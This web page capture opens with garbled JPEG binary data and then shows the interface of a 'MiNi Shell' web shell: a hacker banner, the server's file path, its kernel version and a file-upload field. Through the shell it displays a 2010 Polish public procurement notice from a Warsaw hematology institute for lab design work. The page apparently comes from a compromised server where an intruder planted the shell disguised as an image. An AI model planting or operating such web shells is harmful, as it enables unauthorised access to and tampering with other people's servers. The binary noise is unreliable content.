JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/281139-N-2010.html

<p class="kh_header"><b>Warszawa: IHIT/P/56/2010 - Zadanie nr 1 - Wykonanie projektu technicznego pracowni preparatyki krwiotwórczych komórek macierzystych;Zadanie 2 - Wykonanie projektu technicznego pracowni mikrobiologii.</b><br>
<b>Numer ogłoszenia: 281139 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hematologii i Transfuzjologii , ul. Indiry Gandhi 14, 02-776 Warszawa, woj. mazowieckie, tel. 022 349 62 22, faks 022 349 62 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihit.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> IHIT/P/56/2010 - Zadanie nr 1 - Wykonanie projektu technicznego pracowni preparatyki krwiotwórczych komórek macierzystych;Zadanie 2 - Wykonanie projektu technicznego pracowni mikrobiologii..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia: Usługa 
Zdanie 1. Wykonanie projektu technicznego pracowni preparatyki krwiotwórczych komórek macierzystych
Zadanie 2. Wykonanie projektu technicznego pracowni mikrobiologii

Zdanie nr 1
Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest projekt techniczny, wielobranżowy przebudowy pomieszczeń Instytutu dla zapewnienia warunków jakości i bezpieczeństwa preparatyki krwiotwórczych komórek macierzystych. W ramach realizacji powyższego zadania Zamawiający zamierza na terenie istniejącego Laboratorium - parter budynku C przebudować część pomieszczeń  ( zaznaczone na zał. nr 8 do SIWZ  jako zadanie nr 1 ) z przeznaczeniem na Bank Komórek Krwiotwórczych przy założeniu utrzymania istniejących laboratoriów i pozostałych funkcji pomieszczeń
  Projekt stanowiący przedmiot niniejszego zamówienia winien zawierać następujące elementy składowe:
-	Projekt technologii laboratoryjnej
-	Projekt budowlany do złożenia wniosku  o decyzję o pozwolenie na wykonanie robót budowlanych 
-	projekty wykonawcze we wszystkich branżach wynikających ze specyfiki przyjętych rozwiązań 
-	kosztorysy inwestorskie obejmujące pełen zakres robót
-	specyfikację techniczną wykonania i odbioru robót
Wykonany projekt powinien być zgodny z aktualnie obowiązującymi przepisami ze szczególnym uwzględnieniem Ustawy z dnia 1 lipca 2005 r. o pobieraniu, przechowywaniu i przeszczepianiu komórek, tkanek i narządów (Dz. U. z 2005 r. Nr 169, poz. 1411 z późn. zm.) i oraz Rozporządzenia Ministra Zdrowia z dnia 20 listopada 2006 r. w sprawie wymagań fachowych i sanitarnych dla banków tkanek i komórek. Rozwiązania projektowe muszą posiadać wszystkie wymagane uzgodnienia, w tym opinię rzeczoznawcy ds. p.poż, sanitarnych, BHP.
Opis technologii preparatyki:
1)      Preparaty krwiotwórczych komórek macierzystych (szpik, komórki z krwi obwodowej, krew pępowinowa) pobierane będą w ośrodkach pobierających (Pracownia Transfuzjologii Klinicznej z Bankiem Krwi, Blok Operacyjny, zewnętrzne ośrodki pobierania komórek krwiotwórczych) zgodnie z Ustawą z dnia 1 lipca 2005 r. o pobieraniu, przechowywaniu i przeszczepianiu komórek, tkanek i narządów (Dz. U. z 2005 r. Nr 169, poz. 1411 z późn. zm.)  i przekazywane w postaci preparatów zabezpieczonych przed wpływem środowiska zewnętrznego do Pracowni Transfuzjologii Laboratoryjnej z Bankiem Komórek Krwiotwórczych. W Pracowni w środowisku o klasie czystości D poddawane będą preparatyce w systemie zamkniętym lub w środowisku o klasie czystości A (komora laminarna). W klasie A przygotowywane będą odczynniki niezbędne do przygotowania preparatów do mrożenia oraz wykonywane jest pobieranie próbek do badań analitycznych. Po przeniesieniu preparatu do pojemnika kriogenicznego i ostatecznym zamknięciu układu, preparat przenoszony będzie do zamrożenia do pomieszczenia kriostatów (drogą czystą, która nie krzyżuje się z dostawą komórek i innymi czynnościami). 
2)      Preparaty zamrożone będą przenoszone z pomieszczenia kriostatów do Pracowni i rozmrażane w pomieszczeniach banku w systemie zamkniętym. Pobierane są z nich próbki w systemie zamkniętym, a preparat wydawany jest do Kliniki Transplantacyjnej. 
Zdanie nr 2
Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest projekt techniczny, wielobranżowy przebudowy pomieszczeń Instytutu dla zapewnienia warunków procesu kontroli zakażeń szpitalnych dla laboratorium mikrobiologicznego                                                                                         W ramach realizacji powyższego zadania Zamawiający zamierza na terenie istniejącego Laboratorium - parter budynku C przebudować część pomieszczeń ( zaznaczone na zał. nr 8 do SIWZ jako zadanie nr 2 )z przeznaczeniem na  laboratorium mikrobiologiczne
Zgodnie z rozporządzeniem Ministra Zdrowia z dn.03 marca 2004 r. w sprawie wymagań, jakim powinno odpowiadać medyczne laboratorium diagnostyczne, - pomieszczenia laboratorium 
Mikrobiologii powinny być dostosowane do rodzaju prac jakie są w nim wykonywane w sposób zapewniający poprawna jakość pomiaru i wiarygodność wyniku.
W ramach zaznaczonego na załączniku nr 8  do SIWZ obszaru należy zaprojektować pomieszczenia niezbędne w laboratorium 
-punkt przyjęć materiałów do badań ,
-2 - pomieszczenia do wykonywania czynności diagnostycznych,
- pomieszczenie aparaturowe,
- śluza.
Projekt stanowiący przedmiot niniejszego zamówienia winien zawierać następujące elementy składowe:
-	Projekt technologii laboratoryjnej
-	Projekt budowlany do złożenia wniosku zgłoszenia wykonania  robót budowlanych, 
-	projekty wykonawcze we wszystkich branżach wynikających ze specyfiki przyjętych rozwiązań 
-	kosztorysy inwestorskie obejmujące pełen zakres robót
-	specyfikację techniczną wykonania i odbioru robót

Wymagania Zamawiającego w stosunku do zadania nr 1 i zadania nr 2 przedmiotu zamówienia:
      Dokumentacja projektowo-kosztorysowa powinna być wykonana zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 10.07.2003 r.  (Dz. U. nr 120 poz. 1133 z późn. zm. z dnia 06.11.2008 r. Dz. U. Nr 201, poz. 1239) w sprawie szczegółowego zakresu i formy 	projektu budowlanego oraz Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202 poz. 2072 ze zm.)
Kosztorysy inwestorskie powinny być wykonane zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389). 
Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych, sporządzonych zgodnie z wymogami Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r., nr 202, poz. 2072 z późn. zm.),
Dokumentację projektową w wersji elektronicznej należy wykonać w formacie umożliwiającym odczyt plików i ich wydruk, a mianowicie:
- pliki tekstowe: rozszerzenie .doc i .pdf,
- pliki graficzne: rozszerzenie .dwg  i .pdf,
- arkusze kalkulacyjne: rozszerzenie .xls i .pdf.
- kosztorysy i przedmiary wg programu Norma
Wykonawca jest zobowiązany dołączyć do dostarczonej Zamawiającemu dokumentacji oświadczenie, że jest ona wykonana i sprawdzona zgodnie z umową, obowiązującymi przepisami prawa i zasadami wiedzy technicznej oraz, że została wydana w stanie kompletnym z punktu widzenia celu, któremu ma służyć
  Autorem projektu   Instytutu Hematologii i Transfuzjologii  jest Biuro Studiów i Projektów Służby Zdrowia PROAMED Sp. z o.o. z Warszawy ul. Wileńska 69.. Biuro Projektów  wyraziło zgodę na nieodpłatne wykorzystanie praw autorskich przez Instytut i wykonawcę projektów przebudowy wytypowanych pomieszczeń budynku nr 2 (C) dla potrzeb przedmiotowego zamówienia. ( Pismo do wglądu u Zamawiającego).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.1. Przystępując do przetargu, Wykonawca  jest obowiązany   wnieść  wadium w wysokości  1 893,00 PLN  (słownie: jeden tysiąc  osiemset  dziewięćdziesiąt  trzy złote,00/100)
W  terminie  do  dnia :  19.10.2010r. do  godz. 09:00
2.	FORMA WPŁATY WADIUM
2.1.	Wadium może być wnoszone w:
2.1.1.	pieniądzu , płatne na konto:
Instytutu Hematologii i Transfuzjologii
		w banku:   BANK PEKAO S.A. 
		Nr r-ku:     16 1240 6003 1111 0000 4946 7956

Wadium wnoszone w pieniądzu uważa się za wniesione skutecznie wówczas, gdy przed upływem  terminu określonego w pkt. 1 nastąpi uznanie rachunku Zamawiającego

2.1.2.	poręczeniach  bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
           kredytowej, z  tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym 
2.1.3.	gwarancjach ubezpieczeniowych
2.1.4.	gwarancjach bankowych
2.1.5.	poręczeniach  udzielanych  przez  podmioty,  o  których  mowa w art. 6b ust. 5 pkt. 2   
             ustawy z  dnia  9  listopada  2000 r.  o  utworzeniu  Polskiej  Agencji Rozwoju 
             Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275, ze zm.)
Do oferty należy załączyć:
-	kopię dokumentu, potwierdzającego wniesienie wadium w pieniądzu oraz numer rachunku bankowego, na który ma być dokonany zwrot wadium, lub
-	oryginał dokumentu określonego w pkt. 2.1.2 - 2.1.5 oraz jego kopię potwierdzoną za zgodność z oryginałem. Oryginał dokumentu należy dołączyć do oferty w sposób umożliwiający jego zwrot bez uszkodzenia.
Wadium wniesione w innej formie niż pieniądz musi obowiązywać przez cały okres związania z ofertą.
2.2.	Wszystkie dokumenty, potwierdzające wniesienie wadium muszą zawierać numer przetargu, którego dotyczą .
2.3.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
2.4.	Wykonawca, który  nie wniesie wadium w wymaganej formie zostanie wykluczony z       postępowania.

3.	ZWROT WADIUM
3.1. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty  
       najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta 
       została  wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień 
        publicznych.  
3.2. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca 
        wadium  niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu
        zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano
3.3. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed 
       upływem terminu składania ofert
3.4. Zamawiający  żąda ponownego wniesienia wadium przez Wykonawcę , któremu zwrócono  
       wadium na  podstawie pkt. 3.1 , jeżeli  w wyniku rozstrzygnięcia odwołania jego oferta została 
       wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez 
       Zamawiającego.
3.5.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je zgodnie z zasadami określonymi 
      w   art. 46  ust. 4  ustawy Prawo zamówień publicznych.
3.6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
       wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów, lub oświadczeń, o których  
       mowa w art. 25 ust. 1 ustawy Pzp., lub pełnomocnictw, chyba że udowodni, że wynika to z 
       przyczyn nieleżących po jego stronie
3.7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została
       wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków, o których mowa nastąpi na podstawie dokumentu - Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu , o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych -zgodnie z załącznikem nr 2 do SIWZ , metodą warunku granicznego spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  przez Wykonawcę , jeżeli wykaże on, że:
a)  wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli   okres prowadzenia działalności jest krótszy  - w tym okresie, co najmniej 5  usług  wykonania dokumentacji  projektowo-kosztorysowej w służbie zdrowia, każda o  wartości   minimum 40.000,0 zł brutto 
Ocena spełnienia warunku  nastąpi  na podstawie dokumentu , metoda warunku granicznego spenia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków, o których mowa nastąpi na podstawie dokumentu - Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu , o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych -zgodnie z załącznikem nr 2 do SIWZ , metodą warunku granicznego spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  przez Wykonawcę , jeżeli wykaże on, że dysponuje co najmniej :
a)	1 osobą projektanta z uprawnieniami budowlanymi do projektowania bez ograniczeń w specjalności architektonicznej;
b)	1 osobą projektanta z uprawnieniami  budowlanymi do projektowania bez ograniczeń  w specjalności konstrukcyjno - budowlanej;
c)	1 osobą projektanta z uprawnieniami  budowlanymi do projektowania bez ograniczeń w specjalności instalacyjnej sieci, instalacji urządzeń elektrycznych i  elektroenergetycznych;
d)	1 osoba projektanta  z uprawnieniami budowlanymi do projektowania bez ograniczeń  w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń cieplnych, wentylacyjnych, gazowych , wodociągowych i kanalizacyjnych.
Ocena spełnienia warunku  nastąpi  na podstawie dokumentu , metoda warunku granicznego spenia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  przez Wykonawcę , jeżeli wykaże on, że:
a)jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
 działalności  na kwotę  nie mniejsza niż 50.000,00 zł.
Ocena spełnienia warunku  nastąpi  na podstawie dokumentu , metoda warunku granicznego spenia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ihit.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hematologii i Transfuzjologii 
02-776 Warszawa, ul. Indiry Gandhi 14, V piętro p. 508 
Dział zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 09:00, miejsce: Instytut Hematologii i Transfuzjologii
02-776 Warszawa, ul. Indiry Gandhi 14, I piętro p. 144A (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





